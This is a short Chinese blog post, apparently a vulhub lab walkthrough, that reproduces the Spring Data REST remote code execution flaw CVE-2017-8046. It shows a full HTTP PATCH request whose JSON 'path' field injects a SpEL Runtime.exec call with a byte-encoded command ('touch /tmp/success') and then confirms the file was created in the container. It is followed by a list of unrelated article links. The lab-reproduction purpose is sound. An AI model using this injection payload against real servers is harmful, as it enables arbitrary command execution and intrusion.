Spring Data Rest 远程命令执行命令(CVE-2017-8046)

谪仙1232024-09-24 16:31

(1)访问 http://your-ip:8080/customers/1,然后抓取数据包,使用PATCH请求来修改

PATCH /customers/1 HTTP/1.1

Host:

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json-patch+json

Content-Length: 202

{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }

返回kali 输入命令进docker入容器 ls /tmp查看 可以发现 成功创建success

相关推荐
重庆穿山甲21 小时前
Java开发者的大模型入门:Spring AI组件全攻略(一)
前端·后端
布列瑟农的星空21 小时前
前端都能看懂的rust入门教程(二)——函数和闭包
前端·后端·rust
颜酱21 小时前
二叉树分解问题思路解题模式
javascript·后端·算法
zone773921 小时前
001:LangChain的LCEL语法学习
人工智能·后端·面试
zone773921 小时前
001:简单 RAG 入门
后端·python·面试
嘻哈baby1 天前
如何理解Rust语言中Send和Sync?
后端
用户298698530141 天前
.NET 文档自动化:Spire.Doc 设置奇偶页页眉/页脚的最佳实践
后端·c#·.net
码路飞1 天前
GPT-5.3 Instant 终于学会好好说话了,顺手对比了下同天发布的 Gemini 3.1 Flash-Lite
java·javascript
序安InToo1 天前
第6课|注释与代码风格
后端·操作系统·嵌入式
xyy1231 天前
C#: Newtonsoft.Json 到 System.Text.Json 迁移避坑指南
后端
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05OpenClaw优化飞书API 额度已耗尽问题06Window 10部署openclaw报错node.exe : npm error code 12807网站改了域名,如何查找?08小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)09Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤10本地部署 OpenClaw + DeepSeek-R1 完全指南